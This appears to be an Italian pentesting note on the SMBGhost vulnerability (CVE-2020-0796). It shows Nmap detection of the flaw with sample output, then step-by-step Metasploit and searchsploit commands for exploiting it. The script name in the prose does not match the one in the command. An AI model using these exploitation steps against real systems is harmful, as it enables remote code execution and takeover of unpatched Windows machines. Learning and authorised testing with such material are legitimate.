tags: SMBGhost SMBGhost_Nmap SMBGhost_Exploit
Nmap
Lo script smb-ghost.nse è uno script di Nmap progettato per rilevare la vulnerabilità CVE-2020-0796, nota anche come SMBGhost. Questa vulnerabilità riguarda il protocollo Server Message Block (SMB) di Microsoft e può permettere a un aggressore di eseguire codice arbitrario su un sistema vulnerabile.
Cosa Fa lo Script?
-
Rileva la Vulnerabilità: Lo script verifica se il sistema target è vulnerabile a SMBGhost.
-
Utilizza Tecniche di Fingerprinting: Lo script analizza la versione del protocollo SMB e altre caratteristiche per determinare se il sistema è a rischio.
2. Come Funziona la Vulnerabilità SMBGhost?
La vulnerabilità SMBGhost si trova nella versione 3.1.1 del protocollo SMB di Microsoft. Un aggressore può sfruttare questa vulnerabilità per:
-
Eseguire Codice Arbitrario: Ottenere il controllo completo del sistema target.
-
Causare Denial of Service (DoS): Far crashare il sistema o renderlo inaccessibile.
nmap --script smb-vuln-cve-2020-0796 -p 445 <target>Esempio di Output
Se il sistema è vulnerabile, lo script restituirà un messaggio simile a questo:
Host script results:
| smb-vuln-cve-2020-0796:
| VULNERABLE:
| SMBv3.1.1 compression buffer overflow (CVE-2020-0796)
| State: VULNERABLE
| IDs: CVE:CVE-2020-0796
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv3.1.1.
| This vulnerability is also known as SMBGhost.
|
| Disclosure date: 2020-03-12
| References:
| https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0796Questo script non è integrato con la flag -sC di Nmap.
Exploit
Per exploitarlo abbiamo tre strade: cercare degli exploit su internet, utilizzare Metasploit oppure utilizzare searchsploit , io mostrerò solo gli ultimi due:
Metasploit
msfconsole
search cve-2020-0796
use exploit/windows/smb/cve_2020_0796
set RHOSTS <target_ip>
run
Searchsploit
searchsploit SMBGhost
searchsploit -x <percorso_exploit>
